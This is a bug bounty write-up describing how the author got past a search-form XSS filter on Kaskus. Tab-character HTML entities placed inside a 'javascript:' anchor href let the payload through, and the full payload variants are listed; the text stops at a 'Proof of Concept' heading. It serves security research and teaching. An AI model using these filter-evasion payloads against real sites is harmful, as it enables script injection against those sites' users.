Reflected XSS Bypass Payloads with HTML Entities : Kaskus Bug Bounty

In bug bounty programs, security researchers often face the challenge of injecting XSS (Cross-Site Scripting) payloads into search forms. In this write-up, I will explain the steps I took and the results obtained while attempting to inject an XSS payload into a search form.

1. Trying Common XSS Payloads

In the initial stage, I tried using several common XSS basic payloads such as
Payloads :
a. <script>alert()</script>
b. <svg onload=alert()>
c. <body onload=alert()>
d. <img src=x onerror=alert()>

Responses :

a. alert()
b. <svg>
c. <body>
d. <img src="x" alert()>

However, I found that all of these payloads did not execute successfully due to effective filtering implemented by the robust system.

2. Injecting Anchor Tags

To search for other potential security vulnerabilities, I decided to inject an XSS payload using an HTML link, specifically an anchor tag `<a>`. I attempted to use the payload `<a href="//">XSS</a>`. As a result, the payload was successfully transformed into an embedded link, and when clicked, it redirected the user to the Google page.

3. Attempting a JavaScript Payload within an Anchor Tags

Since I successfully injected an embedded link, I was intrigued to further attempt injecting JavaScript code within the link payload. I tried using the payload :

<a href="javascript:alert()">XSS</a>

However, I discovered that the system modified the payload to :

<a href="[Removed]:alert()">XSS</a>

preventing the execution of JavaScript code.

4. Bypassing JavaScript Using the &Tab;, &#9;, or &#x09; Characters

Not giving up, I continued exploring ways to bypass the system's filtering of JavaScript code. In addition to using the `&Tab;` character, I also tried using other HTML entities to represent the tabulation character (Tab) in HTML.

Related Articles :
1. Cross Site Scripting (XSS)
2. Stored XSS in Kaskus
3. Top 10 XSS Challenge Games to Improve Web Security Skills
4. Blind XSS using XSS Hunter

I attempted to replace the tabulation character using `&#9;` or `&#x09;`. In this case, I modified the payload to

<a href="javas&Tab;cript:alert()">XSS</a>
<a href="javas&#9;cript:alert()">XSS</a>
<a href="javas&#x09;cript:alert()">XSS</a>

Responses :

or you can also use

<a href="j&#9;a&#9;v&#9;a&#9;s&#9;c&#9;r&#9;i&#9;p&#9;t:alert()">XSS</a>
<a href="j&#x09;a&#x09;v&#x09;a&#x09;s&#x09;c&#x09;r&#x09;i&#x09;p&#x09;t:alert()">XSS</a>
<a href="j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t:alert()">XSS</a>

Responses :

The system interpreted `&Tab;`, `&#9;` and `&#x09;` as tabulation characters during payload processing.

As a result, the system didn't recognize the JavaScript code, and the payload successfully executed, triggering an XSS alert. This technique represents an alternative approach to evade filtering of JavaScript code within link payloads.

During the security testing process, researchers often employ various techniques and special characters to bypass filters and manipulate incoming input. The use of `&Tab;`, `&#9;`, or `&#x09;` characters within payloads represents some examples of attempts to deceive systems and exploit potential security vulnerabilities that might remain undetected.

Proof of Concept